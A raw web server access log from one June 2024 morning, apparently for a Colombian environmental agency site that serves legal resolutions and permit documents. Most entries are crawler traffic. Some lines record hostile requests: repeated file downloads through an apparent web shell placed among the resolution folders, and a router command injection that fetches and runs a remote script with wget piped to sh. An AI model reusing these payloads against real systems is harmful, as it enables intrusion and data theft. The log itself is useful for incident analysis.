201.245.192.253 - - [28/Jun/2024:03:17:19 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35513
201.245.192.253 - - [28/Jun/2024:03:17:20 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.13 - - [28/Jun/2024:03:17:22 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/G__Jurisp.%20Junio%202014_Sent%20Tutela%20Drumond.docx HTTP/1.1" 304 -
66.249.66.11 - - [28/Jun/2024:03:17:22 -0500] "GET /autoliquidacion/index.php?dir=Fauna%20Silvestre/&sort=name&order=desc HTTP/1.1" 200 3032
66.249.66.13 - - [28/Jun/2024:03:17:23 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202002/RES%202002%20551-600/&sort=date&order=desc HTTP/1.1" 200 12947
172.22.2.4 - - [28/Jun/2024:03:15:53 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
201.245.192.253 - - [28/Jun/2024:03:18:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
52.167.144.24 - - [28/Jun/2024:03:18:19 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202021/0875.pdf HTTP/1.1" 304 -
66.249.66.11 - - [28/Jun/2024:03:18:23 -0500] "GET /autoliquidacion/index.php?dir=Fauna+Silvestre%2FEvaluaci%F3n+y+seguimiento+de+permisos+de+aprovechamiento+de+fauna+silvestre%2F HTTP/1.1" 200 4608
66.249.66.11 - - [28/Jun/2024:03:18:23 -0500] "GET /autoliquidacion/index.php?dir=Fauna+Silvestre%2FManual+tramite+en+linea%2F HTTP/1.1" 200 2520
172.22.2.4 - - [28/Jun/2024:03:16:44 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57889
47.238.253.24 - - [28/Jun/2024:03:18:25 -0500] "GET / HTTP/1.1" 200 319
47.238.253.24 - - [28/Jun/2024:03:18:25 -0500] "GET /favicon.ico HTTP/1.1" 200 7782
18.116.205.62 - - [28/Jun/2024:03:18:26 -0500] "HEAD / HTTP/1.1" 200 -
66.249.66.12 - - [28/Jun/2024:03:18:35 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202024/00409.pdf HTTP/1.1" 200 377700
66.249.66.12 - - [28/Jun/2024:03:18:36 -0500] "GET /BLA/resoluciones/AUTOS%202023/05539.pdf HTTP/1.1" 200 3988571
201.245.192.253 - - [28/Jun/2024:03:18:35 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
66.249.66.11 - - [28/Jun/2024:03:18:47 -0500] "GET /BLA/resoluciones/AUTOS%202020/3568.pdf HTTP/1.1" 200 355208
201.245.192.253 - - [28/Jun/2024:03:19:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [28/Jun/2024:03:19:20 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.11 - - [28/Jun/2024:03:19:23 -0500] "GET /autoliquidacion/index.php?dir=Permiso%20de%20ocupaci%F3n%20de%20cauce/&sort=date&order=asc HTTP/1.1" 200 2434
201.245.192.253 - - [28/Jun/2024:03:19:25 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35333
47.128.59.163 - - [28/Jun/2024:03:19:44 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5Cgis%5C&f=GIS_Geometrycollection.class.php&ft=download&white=1 HTTP/1.1" 200 11231
216.245.221.92 - - [28/Jun/2024:03:19:53 -0500] "HEAD / HTTP/1.1" 200 -
207.46.13.6 - - [28/Jun/2024:03:19:59 -0500] "GET /BLA/resoluciones/AUTOS%202013/1130.pdf HTTP/1.1" 200 986267
47.128.31.217 - - [28/Jun/2024:03:20:00 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=cleanup.lib.php&ft=download&white=1 HTTP/1.1" 200 1438
201.245.192.253 - - [28/Jun/2024:03:20:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [28/Jun/2024:03:20:09 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35513
47.128.31.198 - - [28/Jun/2024:03:20:18 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=server_status_advisor.lib.php&ft=download HTTP/1.1" 200 1945
66.249.66.11 - - [28/Jun/2024:03:20:24 -0500] "GET /autoliquidacion/Auto%20Declaraci%C3%B3nTr%C3%A1mite%20de%20Licenciamiento%20Urban%C3%ADstico%20y%20Actos%20de%20Reconocimiento%20de%20Usos%20Industriales/Anexo%202.%20Autodeclaraci%C3%B3n%20por%20impacto%20ambiental%20-%20Producci%C3%B3n%20artesanal%20e%20industria%20livian.pdf HTTP/1.1" 200 279699
47.128.39.222 - - [28/Jun/2024:03:20:31 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries&f=Footer.class.php&ft=download HTTP/1.1" 200 9849
47.128.30.221 - - [28/Jun/2024:03:20:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5C&f=arcgis.txt&ft=download&white=1 HTTP/1.1" 200 75
66.249.66.11 - - [28/Jun/2024:03:21:01 -0500] "GET /BLA/resoluciones/AUTOS%202014/5668.pdf HTTP/1.1" 200 228818
47.128.40.70 - - [28/Jun/2024:03:21:03 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=server_databases.lib.php&ft=download&white=1 HTTP/1.1" 200 15205
201.245.192.253 - - [28/Jun/2024:03:21:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
47.128.111.242 - - [28/Jun/2024:03:21:18 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=index.lib.php&ft=download HTTP/1.1" 200 1284
201.245.192.253 - - [28/Jun/2024:03:21:20 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.12 - - [28/Jun/2024:03:21:24 -0500] "GET /autoliquidacion/index.php?dir=Fauna+Silvestre%2FSALVODONCUTOI+DE+MOVILIZACI%D3N+DE+FAUNA+SILVESTRE%2F HTTP/1.1" 200 3119
66.249.66.11 - - [28/Jun/2024:03:21:25 -0500] "GET /autoliquidacion/index.php?dir=Fauna+Silvestre%2FAUTORIZACI%D3N+DE+EXPORTACI%D3N+O+IMPORTACI%D3N+DE+FAUNA+SILVESTRE%2F HTTP/1.1" 200 3175
66.249.66.13 - - [28/Jun/2024:03:21:25 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202002/RES%202002%20401-450/&sort=name&order=desc HTTP/1.1" 200 12023
47.128.127.155 - - [28/Jun/2024:03:21:34 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=StringNativeType.class.php&ft=download HTTP/1.1" 200 3982
66.249.66.12 - - [28/Jun/2024:03:21:37 -0500] "GET /BLA/resoluciones/Notificaciones/AUTOS%202023/3870.pdf HTTP/1.1" 200 440868
66.249.66.11 - - [28/Jun/2024:03:21:37 -0500] "GET /BLA/resoluciones/AUTOS%202023/1483.pdf HTTP/1.1" 200 1886244
47.128.40.82 - - [28/Jun/2024:03:21:50 -0500] "GET /BLA/resoluciones/AUTOS%202021/0245.php?act=f&d=E%3A%5Cnuevo%5CphpMyAdmin2%5Clibraries%5C&f=user_preferences.lib.php&ft=download&white=1 HTTP/1.1" 200 8989
201.245.192.253 - - [28/Jun/2024:03:22:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.12 - - [28/Jun/2024:03:22:25 -0500] "GET /autoliquidacion/index.php?dir=Solicitud%20de%20expedici%F3n%20de%20certificados%20de%20estado%20de%20conservaci%F3n%20ambiental%20(CECA)/&sort=size&order=asc HTTP/1.1" 200 3722
66.249.66.11 - - [28/Jun/2024:03:22:26 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/4111.pdf HTTP/1.1" 304 -
66.249.66.12 - - [28/Jun/2024:03:22:56 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202013/1520.pdf HTTP/1.1" 200 265004
201.245.192.253 - - [28/Jun/2024:03:23:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [28/Jun/2024:03:23:12 -0500] "GET /BLA/resoluciones/AUTOS%202023/0159.pdf HTTP/1.1" 200 388113
201.245.192.253 - - [28/Jun/2024:03:23:20 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
172.22.2.4 - - [28/Jun/2024:03:21:43 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
66.249.66.11 - - [28/Jun/2024:03:23:26 -0500] "GET /autoliquidacion/index.php?dir=Solicitud%20de%20expedici%F3n%20de%20certificados%20de%20estado%20de%20conservaci%F3n%20ambiental%20(CECA)/&sort=name&order=desc HTTP/1.1" 200 3721
207.46.13.6 - - [28/Jun/2024:03:23:30 -0500] "GET /BLA/resoluciones/AUTOS%202014/5035.pdf HTTP/1.1" 200 566943
3.20.63.178 - - [28/Jun/2024:03:23:33 -0500] "HEAD / HTTP/1.1" 200 -
201.245.192.253 - - [28/Jun/2024:03:23:33 -0500] "POST /kwsrmcab/Wsrmcab  HTTP/1.1" 200 213
66.249.66.11 - - [28/Jun/2024:03:23:38 -0500] "GET /BLA/resoluciones/AUTOS%202023/3826.pdf HTTP/1.1" 200 412611
201.245.192.253 - - [28/Jun/2024:03:24:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
52.167.144.187 - - [28/Jun/2024:03:24:13 -0500] "GET /BLA/resoluciones/AUTOS%202013/1476.pdf HTTP/1.1" 200 854784
172.22.2.4 - - [28/Jun/2024:03:22:34 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54300
186.154.191.116 - - [28/Jun/2024:03:24:17 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX18aNqLI+p3I1aJZsncbQ1z1oK6gl5dJLfZgxtBN6qLtMHdC0ubHHnM+&y=U2FsdGVkX1+g/qpQw4ofdshCqOMayKtyZG2ZRBxskwnrwDIB1EGrPhJnc1++wvWC HTTP/1.1" 200 30
186.154.191.116 - - [28/Jun/2024:03:24:17 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+gtd6QuA1diY3dOvY6Gblo/sakPak38U5zEc3Q0qDBdHYFrvEhKR1tEcU+m31HPWQNQOoxrmSijNq8qgKPx67xUV4oFqLZlfM=&u=U2FsdGVkX1/pJy7gy79deeRjtu19JayBBjbXo+1ovGMK6JnmZFc+zGjRmNwPHi+Y&y=U2FsdGVkX1+g/qpQw4ofdshCqOMayKtyZG2ZRBxskwnrwDIB1EGrPhJnc1++wvWC HTTP/1.1" 200 97
186.154.191.116 - - [28/Jun/2024:03:24:17 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1/hyJPYBXPJm1mg9dcoWfwJnGxJ+1e72xCWIaHe4ddl86IMbfKz4u3GC0jMWlbatjswLAxtyN/IZ7uaV2cH7oLnS1ZzqHmSDhX261EKkCkDVhk9anFnuQ21UHOl3emdkArm8rrdTy/RSjF9EHCez5q7aMPRij0dimeOtKJ2GwlcsbXmK8MYNI4IqSBn+d52LvYkPeJzWbAn/tohNqSpiP374wk3kv+/D2QDg2GW6vIST+HQfmsU9C8HQHtpIchzCFx96If1NRQ9j0HLr2horlVnsmNFLLkXcInY+0O8xgj3jp+gjqt28bUYHsi1suPUzEwBhc7BvXV5l1unhyEhjNwB0ygJbzgF2G/wa5QfCxqSn6bvrUd6ZEDWMD651HWzOS/6gWQBZUvlBB1yo9Bu92TDoFcjoldLDSZtbqH9wOOi/ExNHIjxHAyLdDYZpYoekuwufdLBrTqtfhMB19JL4UCMcMy07jn7Bt9Qkk3iIJX5b9yzGWS/bVfpQjawGWU1FWk1CVQDrS/6mVjvf+1hxmrpH7ZG/X6nU5C+S39wFvIYOQboAo8Iz7k0NnpuFoCZWzWInD5sOWHzVPdIrQ2ka7FBB5eku4kXhSG2pAXVNJSwDFWtvESFp0nXvaKKSOFy2juyNP37FwGc3/uM9wpI/fKZijTnigSQIjAT74/Zl4BCZpAM2qghywNm0rIOQ8Q62BQKIDOu5fuXuuJbhaxyfX5ZJULhd0y1Ree+kva68qs+m0UbE4MUL4kSonDAGVuiiSXLgbbI9kLRofgFWVqVLLJf4Zd0tqgP6GkqkaSR8OXE0lbwOstOt5zCIywmVCWAos3T+pBJOeY3cghz1NkUnrbKjAB8e6uFcftQ3AMfdOWWlynqiVwZLhb5PeA6rWYXb9ZBm4lbjSsX07YHAETEOW9zhmgl9IgUTmctyDX8wxgD2W3GvZLNcg8OyTEH18a5VVNqw/smWpcN48kVcCEGF1VA+6MbAwEbmqGtMvgVNeQmJbsysoyv2r0gNLpa8c7OYHkRqRETaTReY3YQeoxHaccbHBo0T8KOffLhrALCyu6MjVNXt/3wAwfpGIrZ+I1q3h2e3QDmKnPv1JdPkO4Nvjzw8p6cK+CidXu96FjBgLCO7ExPds9sBUjxEswD5N7weqg96bTtbsp158epEcXiOETZ9US7pO9tGfgb85uGCyuZdSxBtXFzNE+s3H2y49d9jv/hEV0DUzkubyPEUZzyEQsZ7hQjX+4Du64ZTaD2gi7Fx+vokrU7jSHaa+yWJ0b42xD7GNr4wu8IWXScTiIbUNVBW7JvarjA3l287DZuTkgHGeP6zot3yL7f81XqVyNj4uCZqvl+zVS4K5bucYJasS+NLKOWgfP+kuBNb8u0uKI8eUst0W0FMm+ZgzU2LYLYMZ1fNWRwfmLv6Dh6mjbKo+Dp6KAeZ9o12bm5OWM9ppy6Cq499CYzbYWRlw8zzQzdE60pX2tGLzYsacfMvYJGGWJ/gGWQXcSaoKLNNifqxa1h9YkOXOJDpeYtnayXoq2Kg/WHKEmNoXyiH6omGwifPZCWM2bb03KY+G1b/R/ELmhqhoojCudG4Nfcszbqow0UOWLmZDhZ9SNUcUZ1fpnvtQbkmny60UZV9V+R2ytjQ1RWCgwNUfisuj++Eny+CtM6oPhQSTB990Dm4Bmc3t8Aw0IjdcUSenOnTzFFE+AaZzVp4Wh6oLjKIv3outtskTzOTykgq0oLAbXRLMgRF64tJ72+OJeA9rDSmT0PumVTSxY2chix4q0t6TFB&u=U2FsdGVkX1/pJy7gy79deeRjtu19JayBBjbXo+1ovGMK6JnmZFc+zGjRmNwPHi+Y&y=U2FsdGVkX1+g/qpQw4ofdshCqOMayKtyZG2ZRBxskwnrwDIB1EGrPhJnc1++wvWC HTTP/1.1" 200 3534
186.154.191.116 - - [28/Jun/2024:03:24:17 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX19tr96P3DHUgP/0H7K42CIw0x5uz1J/wLDqg76AdPZ4MqcZt6/CIeMlFSmB7aaRHfTd/0rwxYi/Ctq3/hkltFD9ZeLuX1c/3RrvwLkeQpuIEPNgU3Ybwk0Kph9vtOdIaHWLsy+aXPbSf8vMoSIM8ure3aorAcsWUSD/pyU09NbgYW9bzNacZ1jgTYdIGj00RycyoE/bw+0QZCnfueReAzvb3o7aWb5r/7CyQKqG4xLfzGpmDj1O6g9qFpgh93Cz9lm1Dsyo6mFiUTpHf2VCYxPfylovW9Uek7IJmmc+KX46Wmaw24NwVonoT6juxgSl7w/arAwr9MpkrfSHA6r+GK/gHWmnFoe0w6mb7zQORC6Dsi/R8XiUOFbX+E7gwnj6CgC/aJ6fQTUQhTv19xjaDGN9R6rk0GsTHgSSAZeHoBybhC0KIU/oabm2nfzzQAtMsku1oZj6/RnRbCiHDptIEZwneGvmv0TP6aFiil2xCKtYmsEVbCxWypFr9Q2r13fPINllPXgcfxDJT5FoN7N0nUZvYgeVQ0rwooti2zJ2hMthltuRkdmMkL59esBjpWZvcLVzPbuOmQNtdt+ABLrIo7iQlXxyzqDaFH7K7M0V7akBATV2eLcKzOqVHEDW7x1TKGwkFGqABCm3P5/ySYQYfnClWRRQPAT0eALRIfqTmwDYOU0jmnEaCxR/RBbVIZmwp92RVAad+hunkleuGCYHi1AIK6bw3Hwe3RolhAGrnWv9JlsWhii3hjFE&u=U2FsdGVkX1/pJy7gy79deeRjtu19JayBBjbXo+1ovGMK6JnmZFc+zGjRmNwPHi+Y&y=U2FsdGVkX1+g/qpQw4ofdshCqOMayKtyZG2ZRBxskwnrwDIB1EGrPhJnc1++wvWC HTTP/1.1" 200 208
186.154.191.116 - - [28/Jun/2024:03:24:17 -0500] "GET /kwssiamovil/sm/cjson/pre?f=1&x=U2FsdGVkX18aNqLI+p3I1aJZsncbQ1z1oK6gl5dJLfZgxtBN6qLtMHdC0ubHHnM+ HTTP/1.1" 200 30244
66.249.66.12 - - [28/Jun/2024:03:24:26 -0500] "GET /autoliquidacion/index.php?dir=Fauna%20Silvestre/&sort=date&order=asc HTTP/1.1" 200 3033
66.249.66.12 - - [28/Jun/2024:03:24:27 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202002/RES%202002%20351-400/&sort=name&order=asc HTTP/1.1" 200 12209
66.249.66.13 - - [28/Jun/2024:03:24:27 -0500] "GET /autoliquidacion/Solicitud%20de%20expedici%C3%B3n%20de%20certificados%20de%20estado%20de%20conservaci%C3%B3n%20ambiental%20(CECA)/Aplicativo.html HTTP/1.1" 200 359
66.249.66.11 - - [28/Jun/2024:03:24:28 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202018/3406.pdf HTTP/1.1" 304 -
66.249.66.11 - - [28/Jun/2024:03:24:38 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202002/1308.pdf HTTP/1.1" 200 156465
66.249.66.12 - - [28/Jun/2024:03:24:39 -0500] "GET /BLA/resoluciones/AUTOS%202023/5754.pdf HTTP/1.1" 200 471889
66.249.66.12 - - [28/Jun/2024:03:24:39 -0500] "GET /autoliquidacion/Auto%20Declaraci%C3%B3nTr%C3%A1mite%20de%20Licenciamiento%20Urban%C3%ADstico%20y%20Actos%20de%20Reconocimiento%20de%20Usos%20Industriales/Anexo%201.%20Formato%20de%20calificaci%C3%B3n%20de%20usos%20industrial.pdf HTTP/1.1" 200 403314
66.249.66.11 - - [28/Jun/2024:03:24:52 -0500] "GET /autoliquidacion/index.php?dir=Fauna%20Silvestre/&sort=size&order=asc HTTP/1.1" 200 3033
216.245.221.92 - - [28/Jun/2024:03:24:53 -0500] "HEAD / HTTP/1.1" 200 -
114.119.158.113 - - [28/Jun/2024:03:25:01 -0500] "GET /BLA/resoluciones/index.php?dir=Notificaciones/RESOLUCIONES%2B2015/&sort=size&order=asc HTTP/1.1" 200 14374
201.245.192.253 - - [28/Jun/2024:03:25:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [28/Jun/2024:03:25:07 -0500] "GET /autoliquidacion/index.php?dir=Permiso%20de%20ocupaci%F3n%20de%20cauce/&sort=name&order=desc HTTP/1.1" 200 2433
66.249.66.12 - - [28/Jun/2024:03:25:20 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202002/RES%202002%20551-600/&sort=size&order=desc HTTP/1.1" 200 12947
201.245.192.253 - - [28/Jun/2024:03:25:20 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.79.105 - - [28/Jun/2024:03:25:33 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202002/RES%202002%20551-600/&sort=name&order=asc HTTP/1.1" 200 12948
172.22.2.4 - - [28/Jun/2024:03:23:56 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 58273
172.22.2.4 - - [28/Jun/2024:03:25:38 -0500] "GET /BLA/boletinlegal/style.css HTTP/1.1" 200 9406
66.249.66.11 - - [28/Jun/2024:03:25:45 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202002/RES%202002%201651-1700/&sort=date&order=desc HTTP/1.1" 200 12154
201.245.192.253 - - [28/Jun/2024:03:26:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
66.249.66.11 - - [28/Jun/2024:03:26:09 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202002/RES%202002%20351-400/&sort=date&order=desc HTTP/1.1" 200 12208
66.249.66.11 - - [28/Jun/2024:03:26:35 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202002/RES%202002%20401-450/&sort=size&order=asc HTTP/1.1" 200 12024
40.77.167.48 - - [28/Jun/2024:03:26:39 -0500] "GET /BLA/resoluciones/AUTOS%202021/6049.pdf HTTP/1.1" 304 -
66.249.66.11 - - [28/Jun/2024:03:27:01 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202002/RES%202002%20601-650/&sort=date&order=asc HTTP/1.1" 200 12037
201.245.192.253 - - [28/Jun/2024:03:27:04 -0500] "GET /kwsrmcab/Wsrmcab?wsdl HTTP/1.1" 200 6948
201.245.192.253 - - [28/Jun/2024:03:27:15 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 36693
201.245.192.253 - - [28/Jun/2024:03:27:16 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 35513
201.245.192.253 - - [28/Jun/2024:03:27:20 -0500] "POST /forms/lservlet;jsessionid=ac16012b30d6716d42d0eef24d9cbe79d3fe11a80187.e3iSbxaKaheRe34OahmPbx4Oa3z0n6jAmljGr5XDqQLvpAe HTTP/1.1" 200 2
66.249.66.11 - - [28/Jun/2024:03:27:27 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202002/RES%202002%20601-650/&sort=name&order=desc HTTP/1.1" 200 12036
66.249.66.11 - - [28/Jun/2024:03:27:31 -0500] "GET /BLA/resoluciones/AUTOS%202023/06443.pdf HTTP/1.1" 200 781825
66.249.66.11 - - [28/Jun/2024:03:27:31 -0500] "GET /BLA/resoluciones/AUTOS%202023/10006.pdf HTTP/1.1" 200 527585
66.249.66.11 - - [28/Jun/2024:03:27:44 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/7303.pdf HTTP/1.1" 200 354358
185.191.127.212 - - [28/Jun/2024:03:27:47 -0500] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(id%3E%60wget+http%3A%2F%2F103.149.28.141%2Ft+-O-+|+sh%60) HTTP/1.1" 404 1018
66.249.66.12 - - [28/Jun/2024:03:27:52 -0500] "GET /BLA/resoluciones/index.php?dir=RESOLUCIONES%202002/RES%202002%201801-1850/&sort=size&order=desc HTTP/1.1" 200 12157
186.154.191.116 - - [28/Jun/2024:03:27:59 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+lwsj9It3w+jek9yoLh97rjLV0vnpQ0+sEb6rrkWM6wR2uBtnhd3yR+oxMcQmfCU6i0c2E0K+Fc8CIHoiOlKlu+2p3YpXtNeFsoXZudpcJQ/YfYkZ/+7LbMH/HtnpKuuhp+J9BGBsbdVU+g480wHmdKmpCeZS+tX2OVftHNm0gAQKCZAIWSdlsU9TgGioWnbIeNu+AU8VrbzELXfz8YAbL3dzHyUcjJQHYYm841DOcnhEE08UQf8Fw3HmVzb6b5P0VYpPmpmEnTg==&u=U2FsdGVkX1/pJy7gy79deeRjtu19JayBBjbXo+1ovGMK6JnmZFc+zGjRmNwPHi+Y&y=U2FsdGVkX1+g/qpQw4ofdshCqOMayKtyZG2ZRBxskwnrwDIB1EGrPhJnc1++wvWC HTTP/1.1" 200 26
186.154.191.116 - - [28/Jun/2024:03:28:00 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1/ZywegSnDnE1ESgmwkHDJmJggHJxZLlYXFNKguDmsUyALnu5aOoWzB3LI3vPoLnu3CxdkUyk/2DEJr45wgKjeabpAoa2GNnTf8JdgFfE8Fb9qw2V/ju2pE4bYSV3kHIOD/I+DJHRRfVnRFLtqJYtl+v2Wp7I/9bpMebJTOaOiJVGGePPGY4njC6JDgM1zVgrWPuODV500gimeuYy6vywP+c8zLD0Nx84PR8+94lHLyldh7rPdhVGugx1Pi2ZPi+v9ft+W8cyxymCdOUcuJE1gUT9mleTprT44//r2KMrNvevCME6WVzIX6K1jc3vgUtv7tNaahx3NA5ODkwjvEXdlO5a6ELeDGs5E8WHWmEa39gcpC71g+KwLIx8sqYjSangh9+M6yNjalfkU3Qc8FW4oJoTEgIky4dLbZ3/OvuIasj/nLSiBrDsp1bLGvQ4/4jOiK5WS0LDdoSEKHwdbA4RLZrgmsyrdHAXSmAESQ44gEzmNC/ZiCvcnqDEEK7ZfKsJmbeiKyReGuFStIhFx1608crrfEAmNEFmce4IVxV/a3HLwpMXhPPKcu4H8mIL2J9yJZFDXalfiiJEU4jAY3LKtmh9W4NfO0dEZ0kND92gY1wsc/V4fHPD3W2w9CD4+/gmVv9L7bdYP0EAPDXjqBZjMWsaPT7X5PcJ5YWnew722f/LuaMkLkVFdluy8yWZw8VtTc9AFl2iD+2eFJDZWFsqzow7JDVhCEJ0/5t9gBJy75+KrA09wW6jTCKdkOvnjwa+c2yCwpT03+0U6zmIXqqHz06EJ3R8ALsuDfEjKG6c03bT1sqRlL8XndF9gZ3MAauMkDQr3vDDcLvBTU1x67Zx7yB8V9fYtjzI25uIMKL2HGJnD/ATmAN8NzPQC6WUiyUhiXkLO43y6L+RXdunPqWvec3Ml0LcmCisJDtskA1Zihvf943bjsa2fh7mD4zxn1QtoPg5IG1zDCoyrVdm4oeIIPLu+Ddc4B1G1TqwXEg6ZUK1ZFnCl/+PkKgZpvZVIcGXvb9LihxQ6zeNEkHWGvYCIg/YUn0Oh+DlAsog/+jcWSetzfeC0xqWl686OsjOtqV8LDWrYv25OABuTYtIEXc0ATQtZu26omUhFjg1kO5dZXuFkqFEb54F+HRjTdc2JL0FcjRC4Jqwmj+7poNro3KHxnGQK7GYLbcRGlk4FGmoCgqCfBxLMzU/qGOTi+aa4FSWUSlRfTnUGw8ghCKFVhrpcZAFwsjuVpW1k00yF7N8WjLwLL4//E9ys4MrIWGFFsTsC2UZ1T2W1Lljnc3s/Jknvw4uA93QkbHWVv+iig6YOJxrHGhaYrFMZOhtQfTv1heWu+I/Y4O5l550cHZRxRNN+JD8EbFB0h7EOldACyx6Wr2f+rQKX0siIucBm3uDeCX/cVKlMoerbRRMdGxQXmo3IErotve09zHRU0k6pGdZvTyQtpcJCaRxf0Nt+2DXkQ0/9YuxiW7tALo38HynWejUvKYmq2f9KxeQmNf/RYteZZXp48l9a+y77HYu6PcEJvD+poxgda10VESRE62MnMMMoKn0kXE7IxSv0eE9thBjZ11p/4p9mqCKfJwWqqddupk7yMu7p22xB2HMFBBTwcGVywHq/sa0YhRwCEkrnB8rj60CcWMVr2LMDLJA9IIFeBUkMvNCPBUEsr56tXyR4GnE4586ioDMm8fVyHUF0vB7V02d1N356F6FYZDTfy8jGPAdAP7nT88sUneiAUiVrUagLKUgymTlpQ/x+YQcitOZtfcBKJZv5E9cPo&u=U2FsdGVkX1/pJy7gy79deeRjtu19JayBBjbXo+1ovGMK6JnmZFc+zGjRmNwPHi+Y&y=U2FsdGVkX1+g/qpQw4ofdshCqOMayKtyZG2ZRBxskwnrwDIB1EGrPhJnc1++wvWC HTTP/1.1" 200 26
186.154.191.116 - - [28/Jun/2024:03:28:00 -0500] "GET /kwssiamovil/sm/acme/a?s=U2FsdGVkX1+V0gK9jzn4kMmoxso2o/9LE78HKXmRJ5Y8yhGRLC7i0yji86g0ilIcqTYZR9Ngvooav3tblkzkv9kZCEwE+OjorAZq7O67Op9MyKghp7tkyn1N6MABegumz+tJ+UNQgjY+W1/6QxisqmGE8MXtfTLYLsuxpnAONrI=&u=U2FsdGVkX1/pJy7gy79deeRjtu19JayBBjbXo+1ovGMK6JnmZFc+zGjRmNwPHi+Y&y=U2FsdGVkX1+g/qpQw4ofdshCqOMayKtyZG2ZRBxskwnrwDIB1EGrPhJnc1++wvWC HTTP/1.1" 200 26
